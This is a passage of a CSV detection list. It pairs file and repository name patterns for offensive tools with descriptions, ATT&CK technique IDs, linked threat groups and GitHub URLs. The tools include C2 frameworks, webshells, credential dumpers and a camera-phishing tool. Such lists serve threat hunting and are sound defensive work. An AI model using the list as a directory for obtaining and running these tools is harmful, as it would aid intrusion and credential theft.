"*/C2concealer*",".{0,1000}\/C2concealer.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","5912"
"*/C2concealer*",".{0,1000}\/C2concealer.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5913"
"*/c2endpoint.php*",".{0,1000}\/c2endpoint\.php.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","5914"
"*/C2Frame.*",".{0,1000}\/C2Frame\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","5915"
"*/C2Manager.cs*",".{0,1000}\/C2Manager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","5916"
"*/c2profile.*",".{0,1000}\/c2profile\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","5917"
"*/c2profile.go*",".{0,1000}\/c2profile\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","5918"
"*/c2profiles.zip*",".{0,1000}\/c2profiles\.zip.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","5919"
"*/C2Profiles/*",".{0,1000}\/C2Profiles\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","5920"
"*/C2ReverseProxy.git*",".{0,1000}\/C2ReverseProxy\.git.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5921"
"*/C2ReverseProxy/*",".{0,1000}\/C2ReverseProxy\/.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5922"
"*/C2ReverseProxy/tarball*",".{0,1000}\/C2ReverseProxy\/tarball.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5923"
"*/C2ReverseProxy/zipball*",".{0,1000}\/C2ReverseProxy\/zipball.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5924"
"*/C2ReverseServer*",".{0,1000}\/C2ReverseServer.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5925"
"*/C2script/*",".{0,1000}\/C2script\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","5926"
"*/C2Server.py*",".{0,1000}\/C2Server\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","5927"
"*/C2-Tool-Collection/*",".{0,1000}\/C2\-Tool\-Collection\/.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","5928"
"*/C3/releases/download/*/C3-*",".{0,1000}\/C3\/releases\/download\/.{0,1000}\/C3\-.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","5929"
"*/C3WebController.dll*",".{0,1000}\/C3WebController\.dll.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","5930"
"*/c99_locus7s.php*",".{0,1000}\/c99_locus7s\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5931"
"*/c99_PSych0.php*",".{0,1000}\/c99_PSych0\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5932"
"*/c99_w4cking.php*",".{0,1000}\/c99_w4cking\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5933"
"*/c99madshell.php*",".{0,1000}\/c99madshell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5934"
"*/c99shell.php*",".{0,1000}\/c99shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5935"
"*/cached-domain-credentials.html*",".{0,1000}\/cached\-domain\-credentials\.html.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5936"
"*/cachedump.py*",".{0,1000}\/cachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","5937"
"*/CACTUSTORCH.git*",".{0,1000}\/CACTUSTORCH\.git.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","5938"
"*/CaiDao-Webshell-Password-LandGrey.jsp*",".{0,1000}\/CaiDao\-Webshell\-Password\-LandGrey\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5939"
"*/cain.html*",".{0,1000}\/cain\.html.{0,1000}","offensive_tool_keyword","Cain&Abel","Cain & Able exploitation tool file ","T1075 - T1110 - T1071 - T1003 - T1555","TA0003 - TA0008","N/A","FIN7 - Night Dragon","Credential Access","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md","1","1","N/A","N/A","N/A","10","1067","310","2024-08-13T04:35:50Z","2021-05-11T12:38:17Z","5940"
"*/CamHacker-*.png*",".{0,1000}\/CamHacker\-.{0,1000}\.png.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","N/A","10","","N/A","","","","5941"
"*/CamHacker.git*",".{0,1000}\/CamHacker\.git.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","N/A","10","","N/A","","","","5942"
"*/Cam-Hackers.git*",".{0,1000}\/Cam\-Hackers\.git.{0,1000}","offensive_tool_keyword","Cam-Hackers","Hack Cameras CCTV FREE","T1125","TA0007","N/A","N/A","Discovery","https://github.com/AngelSecurityTeam/Cam-Hackers","1","1","N/A","N/A","6","10","2025","512","2024-08-06T18:49:02Z","2019-11-16T18:49:35Z","5943"
"*/campaign/*/implant/get_all*",".{0,1000}\/campaign\/.{0,1000}\/implant\/get_all.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","5944"
"*/canary.go",".{0,1000}\/canary\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","5945"
"*/CandyPotato.cpp*",".{0,1000}\/CandyPotato\.cpp.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","5946"
"*/CandyPotato.sdf*",".{0,1000}\/CandyPotato\.sdf.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","5947"
"*/CandyPotato.sln*",".{0,1000}\/CandyPotato\.sln.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","5948"
"*/CandyPotato.vcxproj*",".{0,1000}\/CandyPotato\.vcxproj.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","5949"
"*/canisrufus.git*",".{0,1000}\/canisrufus\.git.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","1","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","5950"
"*/canisrufus.py*",".{0,1000}\/canisrufus\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","1","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","5951"
"*/CapBypass.ps1*",".{0,1000}\/CapBypass\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","5952"
"*/capture_netntlmv2.py*",".{0,1000}\/capture_netntlmv2\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","5953"
"*/carlosevieira/Dirty-Pipe*",".{0,1000}\/carlosevieira\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","N/A","1","9","6","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z","5954"
"*/Carseat.git*",".{0,1000}\/Carseat\.git.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","1","N/A","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","5955"
"*/CarSeat.py -*",".{0,1000}\/CarSeat\.py\s\-.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","N/A","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","5956"
"*/cassandra-brute.nse*",".{0,1000}\/cassandra\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5957"
"*/cassandra-info.nse*",".{0,1000}\/cassandra\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5958"
"*/catspin.git*",".{0,1000}\/catspin\.git.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","5959"
"*/catspin-main/*",".{0,1000}\/catspin\-main\/.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","5960"
"*/cc2_frp.*",".{0,1000}\/cc2_frp\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - 